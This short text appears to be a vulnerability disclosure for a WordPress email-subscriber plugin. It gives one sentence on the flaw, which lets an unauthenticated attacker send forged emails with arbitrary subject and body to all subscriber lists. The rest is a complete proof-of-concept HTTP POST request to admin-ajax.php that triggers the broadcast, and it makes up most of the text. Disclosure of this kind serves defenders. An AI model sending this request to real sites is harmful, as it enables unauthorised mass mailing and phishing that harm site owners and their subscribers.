It allows a remote unauthenticated attacker to send forged emails to all recipients from the available lists of contacts or subscribers, with complete control over the content and subject of the email.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 222
action=admin_init&broadcast_data[id]=999&ig_es_broadcast_submitted=submitted&broadcast_data[subject]=test999&broadcast_data[body]=body-content&broadcast_data[list_ids]=2&broadcast_data[meta][scheduling_option]=schedule_now